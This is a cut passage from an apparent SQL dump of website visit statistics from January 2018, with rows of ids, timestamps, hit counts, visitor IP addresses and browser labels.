,0,0,'216.244.66.194','other'),(199861,1516395536,1,1,0,0,'91.196.178.132','chrome'),(199862,1516396130,1,1,0,0,'46.219.246.221','firefox'),(199863,1516396755,2,2,0,0,'216.244.66.194','other'),(199864,1516398276,1,1,0,0,'91.209.11.236','other'),(199865,1516399225,1,1,0,0,'54.36.149.105','other'),(199866,1516399230,1,1,0,0,'54.36.149.26','other'),(199867,1516399347,1,1,0,0,'193.194.127.111','chrome'),(199868,1516399583,1,1,0,0,'54.36.148.55','other'),(199869,1516399875,1,1,0,0,'54.36.148.154','other'),(199870,1516399944,1,1,0,0,'54.36.148.40','other'),(199871,1516400024,1,1,0,0,'54.36.148.180','other'),(199872,1516400290,2,2,0,0,'216.244.66.246','other'),(199873,1516400752,1,1,0,0,'54.36.149.53','other'),(199874,1516400873,1,1,0,0,'54.36.148.184','other'),(199875,1516400931,1,1,0,0,'54.36.148.70','other'),(199876,1516401125,1,1,0,0,'93.72.11.240','chrome'),(199877,1516402071,1,1,0,0,'8.29.198.26','other'),(199878,1516402268,1,1,0,0,'54.36.148.92','other'),(199879,1516402959,1,1,0,0,'54.36.148.29','other'),(199880,1516403054,1,1,0,0,'167.114.172.225','other'),(199881,1516403073,1,1,0,0,'167.114.172.225','chrome'),(199882,1516403188,1,1,0,0,'216.244.66.246','other'),(199883,1516403291,1,1,0,0,'54.36.149.88','other'),(199884,1516403560,1,0,1,0,'66.249.64.30',''),(199885,1516403706,1,1,0,0,'176.107.123.11','firefox'),(199886,1516403897,1,1,0,0,'54.36.149.20','other'),(199887,1516404055,1,1,0,0,'66.249.64.29','chrome'),(199888,1516404085,1,1,0,0,'66.249.70.29','chrome'),(199889,1516404164,1,0,1,0,'66.249.64.28',''),(199890,1516404473,1,0,1,0,'66.249.64.30',''),(199891,1516404635,1,1,0,0,'54.36.148.87','other'),(199892,1516405126,1,1,0,0,'81.27.148.216','chrome'),(199893,1516405375,1,1,0,0,'54.36.149.65','other'),(199894,1516405504,3,3,0,0,'216.244.66.194','other'),(199895,1516405729,1,1,0,0,'54.36.148.234','other'),(199896,1516405897,1,1,0,0,'66.249.64.28','chrome'),(199897,1516405926,1,1,0,0,'54.36.148.76','other'),(199898,1516406755,1,1,0,0,'77.37.221.104','other'),(199899,1516407018,1,1,0,0,'54.36.148.153','other'),(199900,1516407167,4,4,0,0,'216.244.66.194','other'),(199901,1516407597,1,1,0,0,'54.36.148.158','other'),(199902,1516409082,1,1,0,0,'54.36.149.66','other'),(199903,1516409663,1,1,0,0,'54.36.148.65','other'),(199904,1516410712,1,1,0,0,'54.36.148.114','other'),(199905,1516410925,1,0,1,0,'66.249.64.30',''),(199906,1516410976,5,5,0,0,'216.244.66.246','other'),(199907,1516411207,1,1,0,0,'46.211.102.154','chrome'),(199908,1516411296,1,1,0,0,'54.36.148.90','other'),(199909,1516412904,1,1,0,0,'8.29.198.27','other'),(199910,1516412976,1,1,0,0,'54.36.149.77','other'),(199911,1516413099,1,1,0,0,'54.36.148.77','other'),(199912,1516413283,2,2,0,0,'178.154.171.88','other'),(199913,1516413284,1,1,0,0,'54.36.149.55','other'),(199914,1516413630,1,1,0,0,'54.36.149.78','other'),(199915,1516413841,1,1,0,0,'54.36.149.88','other'),(199916,1516414843,1,1,0,0,'54.36.149.1','other'),(199917,1516415617,1,1,0,0,'54.36.149.70','other'),(199918,1516416271,1,1,0,0,'216.244.66.194','other'),(199919,1516416947,1,1,0,0,'54.36.148.171','other'),(199920,1516416979,3,3,0,0,'216.244.66.246','other'),(199921,1516417893,2,2,0,0,'216.244.66.194','other'),(199922,1516418064,1,1,0,0,'141.8.142.74','other'),(199923,1516418076,1,1,0,0,'51.255.71.116','other'),(199924,1516418842,1,1,0,0,'54.36.149.60','other'),(199925,1516419216,1,1,0,0,'91.196.178.87','other'),(199926,1516419245,1,1,0,0,'54.36.148.120','other'),(199927,1516419413,1,1,0,0,'178.140.232.54','msie'),(199928,1516419418,1,1,0,0,'95.24.21.193','msie'),(199929,1516419716,1,1,0,0,'54.36.148.161','other'),(199930,1516420133,4,4,0,0,'216.244.66.246','other'),(199931,1516420839,1,1,0,0,'178.154.171.88','other'),(199932,1516421203,1,1,0,0,'54.36.149.66','other'),(199933,1516421602,1,1,0,0,'54.36.148.162','other'),(199934,1516422108,1,1,0,0,'54.36.148.120','other'),(199935,1516422455,2,2,0,0,'91.209.11.236','other'),(199936,1516422491,1,1,0,0,'54.36.148.94','other'),(199937,1516422508,1,1,0,0,'54.36.148.69','other'),(199938,1516423213,1,1,0,0,'54.36.148.132','other'),(199939,1516423503,1,0,1,0,'66.249.64.28',''),(199940,1516423556,1,1,0,0,'54.36.148.130','other'),(199941,1516423738,1,1,0,0,'8.29.198.25','other'),(199942,1516423875,1,1,0,0,'207.46.13.6','other'),(199943,1516424207,1,1,0,0,'54.36.149.76','other'),(199944,1516424477,1,1,0,0,'54.36.149.29','other'),(199945,1516424563,1,1,0,0,'54.36.148.75','other'),(199946,1516424818,1,1,0,0,'54.36.148.126','other'),(199947,1516425909,1,1,0,0,'54.36.148.92','other'),(199948,1516426181,1,1,0,0,'54.36.148.41','other'),(199949,1516426401,1,1,0,0,'54.36.148.21','other'),(199950,1516426745,6,6,0,0,'216.244.66.194','other'),(199951,1516427104,1,1,0,0,'146.0.231.218','chrome'),(199952,1516427257,1,1,0,0,'54.36.148.159','other'),(199953,1516427374,1,1,0,0,'54.36.148.232','other'),(199954,1516427378,2,2,0,0,'216.244.66.246','other'),(199955,1516427664,3,3,0,0,'216.244.66.194','other'),(199956,1516428736,1,1,0,0,'54.36.148.83','other'),(199957,1516429118,1,1,0,0,'54.36.149.0','other'),(199958,1516429574,1,1,0,0,'54.36.149.99','other'),(199959,1516429603,1,1,0,0,'54.36.148.68','other'),(199960,1516430668,2,2,0,0,'216.244.66.246','other'),(199961,1516430832,1,1,0,0,'54.36.148.27','other'),(199962,1516430894,1,1,0,0,'54.36.149.98','other'),(199963,1516431073,1,1,0,0,'95.24.11.59','chrome'),(199964,1516431245,1,1,0,0,'54.36.148.248','other'),(199965,1516432122,1,1,0,0,'157.55.39.218','other'),(199966,1516432232,1,1,0,0,'54.36.148.199','other'),(199967,1516432344,1,1,0,0,'54.36.148.253','other'),(199968,1516432467,48,48,0,0,'54.167.126.106','other'),(199969,1516432653,1,1,0,0,'54.36.148.186','other'),(199970,1516432705,1,1,0,0,'54.36.149.8','other'),(199971,1516433000,1,1,0,0,'54.36.148.33','other'),(199972,1516433325,1,1,0,0,'54.36.148.160','other'),(199973,1516433384,26,26,0,0,'54.167.126.106','other'),(199974,1516433597,1,1,0,0,'157.55.39.218','other'),(199975,1516433749,1,1,0,0,'54.36.148.112','other'),(199976,1516433877,1,1,0,0,'54.36.148.197','other'),(199977,1516434161,1,1,0,0,'217.69.134.183','other'),(199978,1516434575,1,1,0,0,'8.29.198.27','other'),(199979,1516434694,1,1,0,0,'54.36.149.89','other'),(199980,1516434714,1,1,0,0,'54.36.148.208','other'),(199981,1516435601,1,1,0,0,'54.36.148.56','other'),(199982,1516435666,1,1,0,0,'54.36.148.186','other'),(199983,1516436222,1,1,0,0,'54.36.148.138','other'),(199984,1516436276,1,1,0,0,'54.36.148.196','other'),(199985,1516436473,1,1,0,0,'54.36.148.232','other'),(199986,1516436586,1,1,0,0,'178.255.168.34','firefox'),(199987,1516436889,2,2,0,0,'216.244.66.194','other'),(199988,1516437270,3,3,0,0,'216.244.66.246','other'),(199989,1516437309,1,1,0,0,'54.36.148.202','other'),(199990,1516437425,1,1,0,0,'91.196.178.81','chrome'),(199991,1516437800,1,1,0,0,'54.36.148.66','other'),(199992,1516438596,1,1,0,0,'216.244.66.194','other'),(199993,1516438776,1,1,0,0,'54.36.148.43','other'),(199994,1516438788,1,1,0,0,'54.36.149.66','other'),(199995,1516439634,1,1,0,0,'54.36.148.143','other'),(199996,1516439830,1,1,0,0,'54.36.148.38','other'),(199997,1516440135,1,1,0,0,'87.250.224.46','other'),(199998,1516440302,1,1,0,0,'54.36.149.43','other'),(199999,1516440465,1,1,0,0,'91.196.178.61','chrome'),(200000,1516441027,1,1,0,0,'37.55.225.134','chrome'),(200001,1516441396,2,2,0,0,'216.244.66.246','other'),(200002,1516441824,1,1,0,0,'178.154.171.88','other'),(200003,1516441859,1,1,0,0,'91.196.178.40','chrome'),(200004,1516441992,1,1,0,0,'54.36.148.122','other'),(200006,1516442107,1,1,0,0,'54.36.148.193','other'),(200007,1516442228,1,1,0,0,'87.250.224.46','other'),(200008,1516442346,1,1,0,0,'54.36.148.230','other'),(200009,1516442515,1,1,0,0,'54.36.148.34','other'),(200010,1516442968,1,1,0,0,'207.46.13.7','other'),(200011,1516443204,1,0,1,0,'66.249.64.28',''),(200012,1516443301,1,0,1,0,'66.249.64.30',''),(200013,1516444039,1,1,0,0,'141.8.142.74','other'),(200014,1516444270,1,1,0,0,'54.36.149.89','other'),(200015,1516444637,1,0,1,0,'66.249.64.30',''),(200016,1516445315,1,1,0,0,'66.249.64.28','chrome'),(200017,1516445413,1,1,0,0,'8.29.198.26','other'),(200018,1516445424,1,1,0,0,'54.36.148.247','other'),(200019,1516445591,1,1,0,0,'54.36.148.29','other'),(200020,1516445945,1,1,0,0,'95.132.37.100','chrome'),(200021,1516446025,1,1,0,0,'54.36.148.64','other'),(200022,1516446204,1,1,0,0,'87.250.224.46','other'),(200023,1516446622,1,1,0,0,'54.36.148.63','other'),(200024,1516446789,1,1,0,0,'78.111.189.156','firefox'),(200025,1516447029,2,2,0,0,'216.244.66.194','other'),(200026,1516447467,1,1,0,0,'157.55.39.163','other'),(200027,1516447745,1,1,0,0,'141.8.142.74','other'),(200028,1516447757,1,1,0,0,'54.36.148.197','other'),(200029,1516447886,1,1,0,0,'54.36.148.83','other'),(200030,1516448336,5,5,0,0,'216.244.66.246','other'),(200031,1516448459,1,1,0,0,'54.36.148.165','other'),(200032,1516448699,1,1,0,0,'66.249.64.30','chrome'),(200033,1516448728,1,1,0,0,'66.249.70.29','chrome'),(200034,1516448780,1,1,0,0,'54.36.148.163','other'),(200035,1516448790,1,1,0,0,'77.120.162.185','firefox'),(200036,1516449202,1,1,0,0,'54.36.148.174','other'),(200037,1516449285,3,3,0,0,'216.244.66.194','other'),(200038,1516449580,1,1,0,0,'54.36.148.104','other'),(200039,1516449641,1,1,0,0,'54.36.149.31','other'),(200040,1516449796,1,1,0,0,'54.36.149.17','other'),(200041,1516450020,2,2,0,0,'91.209.11.236','other'),(200042,1516450295,1,0,1,0,'66.249.64.30',''),(200043,1516450868,1,1,0,0,'54.36.148.85','other'),(200044,1516450960,1,1,0,0,'178.154.171.88','other'),(200045,1516451221,1,1,0,0,'54.36.148.188','other'),(200046,1516452665,1,1,0,0,'54.36.149.175','other'),(200047,1516452800,1,1,0,0,'54.36.148.202','other'),(200048,1516452894,1,1,0,0,'66.249.64.29','chrome'),(200049,1516453378,1,1,0,0,'51.255.71.130','other'),(200050,1516453416,1,1,0,0,'54.36.148.251','other'),(200051,1516453447,2,2,0,0,'216.244.66.246','other'),(200052,1516454311,1,0,1,0,'66.249.64.30',''),(200053,1516454681,1,1,0,0,'54.36.148.115','other'),(200054,1516455207,1,1,0,0,'54.36.148.193','other'),(200055,1516455506,1,1,0,0,'54.36.148.66','other'),(200056,1516456255,1,1,0,0,'8.29.198.26','other'),(200057,1516456950,1,1,0,0,'54.36.148.199','other'),(200058,1516457477,1,1,0,0,'54.36.148.255','other'),(200059,1516457626,1,1,0,0,'54.36.149.53','other'),(200060,1516457824,1,1,0,0,'54.36.149.45','other'),(200061,1516458697,1,0,1,0,'66.249.64.28',''),(200062,1516459251,4,4,0,0,'216.244.66.246','other'),(200063,1516459495,4,4,0,0,'216.244.66.194','other'),(200064,1516459575,1,1,0,0,'54.36.148.182','other'),(200065,1516459693,1,1,0,0,'66.249.70.29','chrome'),(200066,1516460120,1,1,0,0,'54.36.148.96','other'),(200067,1516460258,1,1,0,0,'54.36.149.100','other'),(200068,1516460537,1,1,0,0,'89.15.126.156','firefox'),(200069,1516461586,1,1,0,0,'157.55.39.235','other'),(200070,1516461930,1,1,0,0,'54.36.149.93','other'),(200071,1516462088,1,1,0,0,'54.36.149.70','other'),(200072,1516462292,1,1,0,0,'54.36.148.18','other'),(200073,1516462326,1,1,0,0,'54.36.148.81','other'),(200074,1516462458,1,1,0,0,'54.36.148.170','other'),(200075,1516462822,1,1,0,0,'54.36.148.17','other'),(200076,1516462876,1,1,0,0,'54.36.149.43','other'),(200077,1516463037,1,1,0,0,'66.249.64.29','chrome'),(200078,1516463088,1,1,0,0,'54.36.149.14','other'),(200079,1516463282,1,1,0,0,'54.36.148.143','other'),(200080,1516463364,1,1,0,0,'54.36.149.33','other'),(200081,1516463497,1,1,0,0,'51.255.71.117','other'),(200082,1516464188,1,1,0,0,'54.36.148.39','other'),(200083,1516464305,1,1,0,0,'54.36.148.46','other'),(200084,1516464387,1,1,0,0,'54.36.148.12','other'),(200085,1516464766,1,1,0,0,'66.249.70.29','chrome'),(200086,1516464772,1,1,0,0,'216.244.66.246','other'),(200087,1516465018,1,1,0,0,'54.36.148.19','other'),(200088,1516465621,1,1,0,0,'54.36.149.34','other'),(200089,1516465748,1,1,0,0,'54.36.149.98','other'),(200090,1516466274,1,1,0,0,'54.36.149.5','other'),(200091,1516467090,1,1,0,0,'8.29.198.26','other'),(200092,1516468303,1,1,0,0,'54.36.148.151','other'),(200093,1516468869,1,1,0,0,'54.36.149.30','other'),(200094,1516468924,3,3,0,0,'216.244.66.194','other'),(200095,1516469020,1,1,0,0,'66.249.64.30','chrome'),(200096,1516469864,1,1,0,0,'141.8.142.74','other'),(200097,1516469993,5,5,0,0,'216.244.66.246','other'),(200098,1516469994,2,2,0,0,'54.165.59.7','other'),(200099,1516469998,1,1,0,0,'54.36.148.51','other'),(200100,1516470500,2,2,0,0,'216.244.66.194','other'),(200101,1516470658,1,1,0,0,'54.36.149.1','other'),(200102,1516470842,1,1,0,0,'66.249.70.31','chrome'),(200103,1516470850,1,1,0,0,'54.36.148.254','other'),(200104,1516471015,1,1,0,0,'54.36.149.98','other'),(200105,1516471104,1,0,1,0,'66.249.64.28',''),(200106,1516471349,1,1,0,0,'54.36.148.60','other'),(200107,1516472311,1,1,0,0,'40.77.167.151','other'),(200108,1516472670,1,1,0,0,'91.196.178.27','chrome'),(200109,1516473051,1,1,0,0,'54.36.148.107','other'),(200110,1516473058,1,1,0,0,'54.36.148.125','other'),(200111,1516473222,1,1,0,0,'54.36.148.111','other'),(200112,1516473843,1,1,0,0,'54.36.149.19','other'),(200113,1516474055,1,1,0,0,'54.36.148.80','other'),(200114,1516474100,1,0,1,0,'66.249.64.28',''),(200115,1516474171,1,1,0,0,'37.73.254.217','chrome'),(200116,1516474284,1,1,0,0,'54.36.149.1','other'),(200117,1516474380,1,1,0,0,'54.36.148.243','other'),(200118,1516474499,1,1,0,0,'54.36.148.149','other'),(200119,1516475062,1,1,0,0,'216.244.66.246','other'),(200120,1516475177,1,1,0,0,'54.36.149.41','other'),(200121,1516475283,1,1,0,0,'66.249.64.30','chrome'),(200122,1516475460,1,1,0,0,'66.249.70.29','chrome'),(200123,1516475528,1,1,0,0,'54.36.148.183','other'),(200124,1516475632,1,1,0,0,'54.36.149.7','other'),(200125,1516476574,1,1,0,0,'217.69.133.232','other'),(200126,1516476707,1,1,0,0,'54.36.148.54','other'),(200127,1516476903,1,1,0,0,'54.36.148.70','other'),(200128,1516477584,1,1,0,0,'54.36.149.57','other'),(200129,1516477777,1,1,0,0,'54.36.148.196','other'),(200130,1516477884,1,1,0,0,'95.135.94.86','chrome'),(200131,1516477927,1,1,0,0,'8.29.198.25','other'),(200132,1516478005,1,1,0,0,'54.36.149.84','other'),(200133,1516478039,1,1,0,0,'91.196.178.132','chrome'),(200134,1516478166,1,1,0,0,'54.36.149.4','other'),(200135,1516479558,1,1,0,0,'176.14.192.60','msie'),(200136,1516479563,1,1,0,0,'54.36.149.77','other'),(200137,1516479843,9,9,0,0,'216.244.66.194','other'),(200138,1516479899,1,1,0,0,'54.36.148.203','other'),(200139,1516480634,1,0,1,0,'66.249.64.29',''),(200140,1516480710,5,5,0,0,'216.244.66.246','other'),(200141,1516480746,1,0,1,0,'66.249.70.29',''),(200142,1516480871,1,1,0,0,'66.249.70.29','chrome'),(200143,1516481109,1,1,0,0,'66.249.64.29','chrome'),(200144,1516481847,1,1,0,0,'54.36.148.22','other'),(200145,1516481964,1,1,0,0,'178.154.171.88','other'),(200146,1516482327,1,1,0,0,'54.36.148.173','other'),(200147,1516483045,1,1,0,0,'54.36.148.167','other'),(200148,1516483133,1,1,0,0,'51.255.71.119','other'),(200149,1516483534,1,1,0,0,'54.36.148.41','other'),(200150,1516484412,1,1,0,0,'51.255.71.130','other'),(200151,1516484982,1,1,0,0,'207.46.13.134','other'),(200152,1516485156,1,1,0,0,'54.36.148.40','other'),(200153,1516485406,1,1,0,0,'54.36.148.73','other'),(200154,1516485453,1,1,0,0,'141.8.142.74','other'),(200155,1516485488,1,1,0,0,'66.249.64.30','chrome'),(200156,1516486191,2,2,0,0,'216.244.66.246','other'),(200157,1516486460,1,1,0,0,'40.77.167.51','other'),(200158,1516486857,1,1,0,0,'66.249.70.29','chrome'),(200159,1516486859,1,1,0,0,'178.154.171.88','other'),(200160,1516486864,1,1,0,0,'141.8.142.74','other'),(200161,1516487223,1,1,0,0,'54.36.149.43','other'),(200162,1516487734,1,1,0,0,'54.36.148.166','other'),(200163,1516487799,1,1,0,0,'54.36.148.86','other'),(200164,1516488056,1,1,0,0,'91.196.178.167','chrome'),(200165,1516488107,1,1,0,0,'54.36.148.61','other'),(200166,1516488527,1,1,0,0,'66.249.64.29','chrome'),(200167,1516488759,1,1,0,0,'8.29.198.27','other'),(200168,1516489040,1,1,0,0,'40.77.167.51','other'),(200169,1516489474,1,1,0,0,'54.36.149.102','other'),(200170,1516489643,1,1,0,0,'46.211.126.191','firefox'),(200171,1516490117,1,1,0,0,'54.36.149.90','other'),(200172,1516490268,9,9,0,0,'216.244.66.194','other'),(200173,1516491252,1,0,1,0,'66.249.64.28',''),(200174,1516491516,1,1,0,0,'216.244.66.237','other'),(200175,1516491833,1,1,0,0,'66.249.70.29','chrome'),(200176,1516492131,1,1,0,0,'54.36.149.51','other'),(200177,1516493023,1,1,0,0,'54.36.148.146','other'),(200178,1516493220,1,0,1,0,'66.249.64.30',''),(200179,1516494061,1,1,0,0,'54.36.148.235','other'),(200180,1516494146,1,1,0,0,'54.36.148.22','other'),(200181,1516494474,1,1,0,0,'54.36.148.201','other'),(200182,1516494799,1,1,0,0,'54.36.148.90','other'),(200183,1516494810,1,1,0,0,'54.36.148.236','other'),(200184,1516495401,1,1,0,0,'37.9.113.182','other'),(200185,1516495605,1,1,0,0,'54.36.148.165','other'),(200186,1516497021,1,1,0,0,'54.36.148.205','other'),(200187,1516497039,5,5,0,0,'216.244.66.246','other'),(200188,1516497219,1,1,0,0,'54.36.148.208','other'),(200189,1516497340,1,1,0,0,'66.249.64.30','chrome'),(200190,1516497571,1,1,0,0,'54.36.148.100','other'),(200191,1516499433,1,1,0,0,'54.36.148.55','other'),(200192,1516499592,1,1,0,0,'8.29.198.25','other'),(200193,1516499620,1,1,0,0,'51.255.71.113','other'),(200194,1516499784,1,0,1,0,'66.249.64.28',''),(200195,1516500339,1,1,0,0,'216.244.66.246','other'),(200196,1516500756,1,1,0,0,'178.154.171.88','other'),(200197,1516500978,1,1,0,0,'66.249.70.31','chrome'),(200198,1516501069,9,9,0,0,'216.244.66.194','other'),(200199,1516501718,1,1,0,0,'54.36.149.21','other'),(200200,1516501768,1,1,0,0,'54.36.149.104','other'),(200201,1516502858,1,1,0,0,'54.36.148.232','other'),(200202,1516502894,1,1,0,0,'66.249.64.30','chrome'),(200203,1516503215,1,1,0,0,'54.36.149.22','other'),(200204,1516503634,1,0,1,0,'66.249.70.29',''),(200205,1516503705,1,1,0,0,'162.210.196.100','other'),(200206,1516503930,1,1,0,0,'87.250.224.46','other'),(200207,1516504025,1,1,0,0,'54.36.148.27','other'),(200208,1516504190,1,1,0,0,'54.36.148.178','other'),(200209,1516505135,1,0,1,0,'66.249.64.28',''),(200210,1516505214,1,1,0,0,'54.36.148.40','other'),(200211,1516505238,1,1,0,0,'51.255.71.128','other'),(200212,1516505451,1,1,0,0,'178.154.171.88','other'),(200213,1516506049,1,1,0,0,'54.36.148.125','other'),(200214,1516506462,1,1,0,0,'54.36.148.253','other'),(200215,1516506633,1,1,0,0,'54.36.148.139','other'),(200216,1516507276,1,1,0,0,'54.36.149.79','other'),(200217,1516507344,1,1,0,0,'54.36.148.149','other'),(200218,1516507572,1,1,0,0,'54.36.148.36','other'),(200219,1516507651,1,1,0,0,'216.244.66.246','other'),(200220,1516508057,1,1,0,0,'66.249.70.29','chrome'),(200221,1516508319,1,1,0,0,'54.36.148.60','other'),(200222,1516508615,1,1,0,0,'178.154.171.88','other'),(200223,1516508626,1,0,1,0,'66.249.64.29',''),(200224,1516508926,1,1,0,0,'141.8.142.74','other'),(200225,1516509059,1,1,0,0,'54.36.148.253','other'),(200226,1516509476,1,1,0,0,'54.36.148.70','other'),(200227,1516509939,1,1,0,0,'66.249.64.30','chrome'),(200228,1516510417,1,1,0,0,'8.29.198.27','other'),(200229,1516510826,4,4,0,0,'216.244.66.194','other'),(200230,1516511001,1,1,0,0,'54.36.149.52','other'),(200231,1516511248,1,1,0,0,'141.8.142.74','other'),(200232,1516511676,4,4,0,0,'216.244.66.246','other'),(200233,1516511986,1,1,0,0,'54.36.148.140','other'),(200234,1516512079,1,1,0,0,'51.255.71.130','other'),(200235,1516512282,1,1,0,0,'54.36.149.96','other'),(200236,1516513151,1,1,0,0,'54.36.148.229','other'),(200237,1516513405,1,1,0,0,'54.165.59.7','other'),(200238,1516514752,1,1,0,0,'54.36.148.72','other'),(200239,1516514759,1,1,0,0,'54.36.148.18','other'),(200240,1516515282,1,1,0,0,'54.36.148.254','other'),(200241,1516516198,1,1,0,0,'51.255.71.119','other'),(200242,1516516231,1,1,0,0,'46.42.160.220','msie'),(200243,1516516379,1,1,0,0,'180.76.15.14','other'),(200244,1516516567,1,1,0,0,'54.36.149.53','other'),(200245,1516516984,1,1,0,0,'178.154.171.88','other'),(200246,1516517012,2,2,0,0,'216.244.66.246','other'),(200247,1516517440,2,2,0,0,'54.165.59.7','other'),(200248,1516518604,1,1,0,0,'54.36.148.146','other'),(200249,1516518921,1,1,0,0,'54.36.148.26','other'),(200250,1516519030,1,1,0,0,'37.9.113.182','other'),(200251,1516519455,1,1,0,0,'54.36.148.180','other'),(200252,1516519601,1,1,0,0,'107.167.108.92','other'),(200253,1516520039,1,1,0,0,'54.36.149.7','other'),(200254,1516520183,1,1,0,0,'54.36.149.96','other'),(200255,1516520332,1,1,0,0,'172.241.151.26','other'),(200256,1516520553,1,1,0,0,'51.254.198.142','other'),(200257,1516521247,1,1,0,0,'54.36.148.52','other'),(200258,1516521249,1,1,0,0,'8.29.198.27','other'),(200259,1516521292,1,1,0,0,'54.36.148.151','other'),(200260,1516521562,3,3,0,0,'216.244.66.246','other'),(200261,1516521918,5,5,0,0,'216.244.66.194','other'),(200262,1516522060,1,1,0,0,'91.196.178.129','chrome'),(200263,1516522133,1,1,0,0,'54.36.148.137','other'),(200264,1516522263,1,1,0,0,'207.244.157.139','chrome'),(200265,1516522280,1,1,0,0,'54.36.149.14','other'),(200266,1516522299,1,1,0,0,'54.36.148.124','other'),(200267,1516522601,1,1,0,0,'193.201.83.11','chrome'),(200268,1516522884,2,2,0,0,'141.8.142.74','other'),(200269,1516523143,1,1,0,0,'54.36.149.57','other'),(200270,1516523602,1,1,0,0,'178.154.171.88','other'),(200271,1516523654,1,1,0,0,'54.36.148.47','other'),(200272,1516523707,1,1,0,0,'54.36.148.238','other'),(200273,1516523852,1,1,0,0,'54.36.149.25','other'),(200274,1516523856,1,1,0,0,'54.36.149.102','other'),(200275,1516524473,1,1,0,0,'54.36.148.254','other'),(200276,1516524645,1,1,0,0,'54.36.148.67','other'),(200277,1516524659,1,1,0,0,'54.36.149.51','other'),(200278,1516524739,1,1,0,0,'54.36.148.133','other'),(200279,1516525275,1,1,0,0,'54.36.149.17','other'),(200280,1516525620,1,1,0,0,'54.36.149.20','other'),(200281,1516526459,1,1,0,0,'207.46.13.134','other'),(200282,1516527039,1,1,0,0,'141.8.142.74','other'),(200283,1516527155,1,1,0,0,'54.36.148.125','other'),(200284,1516527281,1,1,0,0,'54.36.148.151','other'),(200285,1516527283,1,1,0,0,'54.36.149.41','other'),(200286,1516527759,1,1,0,0,'216.244.66.246','other'),(200287,1516527815,1,1,0,0,'91.196.177.26','chrome'),(200288,1516528408,1,1,0,0,'54.165.59.7','other'),(200289,1516528595,1,1,0,0,'54.36.148.250','other'),(200290,1516529124,1,1,0,0,'51.255.71.116','other'),(200291,1516529435,1,1,0,0,'54.165.59.7','other'),(200292,1516530378,2,2,0,0,'54.165.59.7','other'),(200293,1516530981,1,1,0,0,'54.36.149.61','other'),(200294,1516531372,1,1,0,0,'141.8.142.74','other'),(200295,1516531669,1,1,0,0,'54.36.149.29','other'),(200296,1516532079,1,1,0,0,'8.29.198.27','other'),(200297,1516532611,3,3,0,0,'216.244.66.194','other'),(200298,1516532876,1,1,0,0,'54.36.148.134','other'),(200299,1516533550,2,2,0,0,'216.244.66.246','other'),(200300,1516533572,1,1,0,0,'54.36.149.61','other'),(200301,1516533745,1,1,0,0,'54.36.149.79','other'),(200302,1516533973,1,1,0,0,'54.36.148.184','other'),(200303,1516534174,3,3,0,0,'178.137.252.215','firefox'),(200304,1516534611,1,1,0,0,'54.36.148.232','other'),(200305,1516534673,1,1,0,0,'54.36.148.193','other'),(200306,1516535265,1,1,0,0,'146.0.231.218','firefox'),(200307,1516535987,1,1,0,0,'54.36.148.56','other'),(200308,1516536139,1,1,0,0,'157.55.39.100','other'),(200309,1516537327,1,1,0,0,'87.250.224.46','other'),(200310,1516537419,1,1,0,0,'54.36.149.13','other'),(200311,1516537629,1,1,0,0,'40.77.167.4','other'),(200312,1516538249,3,3,0,0,'216.244.66.246','other'),(200313,1516538349,1,1,0,0,'176.107.123.11','firefox'),(200314,1516538562,1,1,0,0,'54.36.148.206','other'),(200315,1516538792,1,1,0,0,'54.36.148.56','other'),(200316,1516539206,1,1,0,0,'54.36.148.147','other'),(200317,1516539812,1,1,0,0,'178.154.171.88','other'),(200318,1516539838,1,1,0,0,'109.227.105.229','chrome'),(200319,1516539999,1,1,0,0,'178.137.165.32','chrome'),(200320,1516541100,1,1,0,0,'91.196.178.99','chrome'),(200321,1516542426,7,7,0,0,'216.244.66.194','other'),(200322,1516542915,1,1,0,0,'8.29.198.25','other'),(200323,1516543352,11,11,0,0,'91.121.116.72','other'),(200324,1516544978,4,4,0,0,'216.244.66.246','other'),(200325,1516545388,1,1,0,0,'141.8.132.19','other'),(200326,1516545527,2,2,0,0,'141.8.142.74','other'),(200327,1516547487,1,1,0,0,'141.8.142.74','other'),(200328,1516547491,2,2,0,0,'178.154.171.88','other'),(200329,1516547827,1,1,0,0,'157.55.39.100','other'),(200330,1516548645,1,1,0,0,'178.154.171.88','other'),(200331,1516549100,1,1,0,0,'216.244.66.246','other'),(200332,1516550293,2,2,0,0,'54.165.59.7','other'),(200333,1516550724,1,1,0,0,'141.8.142.74','other'),(200334,1516551995,1,1,0,0,'91.196.178.134','chrome'),(200335,1516552306,1,1,0,0,'216.244.66.194','other'),(200336,1516552484,1,1,0,0,'141.8.132.19','other'),(200337,1516553269,1,1,0,0,'207.46.13.134','other'),(200338,1516553741,1,1,0,0,'8.29.198.25','other'),(200339,1516554029,1,1,0,0,'141.8.142.74','other'),(200340,1516554396,1,1,0,0,'54.36.149.87','other'),(200341,1516554407,1,1,0,0,'207.46.13.134','other'),(200342,1516554485,1,1,0,0,'40.77.167.4','other'),(200343,1516555559,1,1,0,0,'54.36.148.254','other'),(200344,1516555713,3,3,0,0,'216.244.66.246','other'),(200345,1516556282,1,1,0,0,'54.36.148.153','other'),(200346,1516556600,1,1,0,0,'54.36.148.104','other'),(200347,1516556640,1,1,0,0,'207.46.13.134','other'),(200348,1516556753,1,1,0,0,'91.209.11.236','other'),(200349,1516556923,1,1,0,0,'54.36.148.27','other'),(200350,1516556950,1,1,0,0,'37.55.225.134','chrome'),(200351,1516556996,1,1,0,0,'54.36.149.9','other'),(200352,1516557378,1,1,0,0,'54.36.149.1','other'),(200353,1516559259,1,1,0,0,'54.36.148.11','other'),(200354,1516559640,2,2,0,0,'216.244.66.246','other'),(200355,1516559721,1,1,0,0,'91.196.178.98','chrome'),(200356,1516559948,1,1,0,0,'54.36.148.149','other'),(200357,1516560217,1,1,0,0,'13.56.229.65','chrome'),(200358,1516560350,1,1,0,0,'54.36.149.37','other'),(200359,1516561339,1,1,0,0,'54.36.148.134','other'),(200360,1516561750,1,1,0,0,'51.255.71.129','other'),(200361,1516561792,1,1,0,0,'54.36.149.28','other'),(200362,1516562032,1,1,0,0,'54.36.148.101','other'),(200363,1516562149,1,0,1,0,'66.249.64.30',''),(200364,1516562203,1,1,0,0,'54.36.148.113','other'),(200365,1516562425,1,1,0,0,'188.163.71.60','chrome'),(200366,1516562650,1,1,0,0,'54.36.148.147','other'),(200367,1516563102,1,1,0,0,'54.36.149.21','other'),(200368,1516563250,1,1,0,0,'54.36.148.201','other'),(200369,1516563329,5,5,0,0,'216.244.66.194','other'),(200370,1516563339,1,1,0,0,'54.36.148.94','other'),(200371,1516563353,2,2,0,0,'54.165.59.7','other'),(200372,1516563569,1,1,0,0,'54.36.148.115','other'),(200373,1516563752,1,1,0,0,'54.36.148.239','other'),(200374,1516564052,1,1,0,0,'54.36.1